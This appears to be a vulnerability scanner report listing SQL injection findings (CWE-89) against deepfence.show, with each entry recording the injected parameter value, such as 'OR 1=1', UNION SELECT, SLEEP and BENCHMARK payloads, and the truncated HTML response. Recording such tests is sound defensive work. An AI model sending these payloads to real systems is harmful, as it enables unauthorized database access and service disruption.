CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1689\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND 'pKlZ'='\npKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1690\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1691\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1692\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1693\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1694\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1695\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# ORDER BY 1,SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1696\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1697\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1698\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1699\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1700\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# admin\" or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1701\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1702\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '\\\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems 